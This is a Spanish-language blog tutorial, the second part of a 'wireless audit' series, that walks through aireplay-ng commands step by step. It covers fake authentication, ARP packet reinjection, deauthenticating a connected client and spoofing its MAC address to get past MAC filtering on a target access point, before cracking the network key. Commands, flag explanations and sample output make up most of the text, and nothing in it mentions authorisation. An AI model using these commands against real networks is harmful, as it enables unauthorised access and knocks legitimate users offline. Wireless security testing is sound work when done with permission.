Auditoria inalámbrica (II)
sudo aireplay-ng -1 0 -e <essid_objetivo> -a 55:55:55:55:55:55 -h MY:MA:CA:DD:RE:SS <interfaz>
Donde:
- -1 Le dice que NO intente desautentificar clientes.
- -e Es el nombre de la red objetivo.
- -a Es la MAC del AP objetivo.
- -h Es la MAC que tu quieras.
Si el resultado luce así:
03:22:32 Sending Authentication Request
03:22:32 Authentication successful
03:22:32 Sending Association Request
03:22:32 Association successful
Significa que el filtrado esta apagado y podemos continuar con el tutorial, de otra forma salta a la sección Con Filtrado MAC.
Sin Filtrado MAC
1. Reinyección de paquetes.
sudo aireplay-ng -3 -b 55:55:55:55:55:55 -h MY:MA:CA:DD:RE:SS <interfaZ>
Ahora solo debemos ser pacientes hasta recibir un paquete ARP para poder usar una vez recibido el numero de paquetes recibidos se elevara muy rapido, en este punto como el filtrado esta desactivado podemos usar cualquier MAC. Podemos pasar a descifrar la clave.
Con Filtrado MAC
2. Obligamos a desautentificar al cliente que esta en el AP objetivo.
sudo aireplay-ng -0 5 -a 55:55:55:55:55:55 -c 00:11:22:33:44:55 <interface>
Donde:
- -0 Indica el numero de intentos.
- -a El MAC del AP objetivo.
- -c La dirección MAC del cliente.
Para la Re-Inyección se procede de la misma forma solo que ahora nos haremos pasar por el cliente.
sudo aireplay-ng -3 -b 55:55:55:55:55:55 -h 00:11:22:33:44:55 <interfaz>
Como había mencionado… Ahora solo debemos ser pacientes hasta recibir un paquete ARP para poder usar una vez recibido el numero de paquetes recibidos se elevara muy rapido, en este punto como el filtrado esta desactivado podemos usar cualquier MAC. Podemos pasar a descifrar la clave.
Original El Tux AngelVerde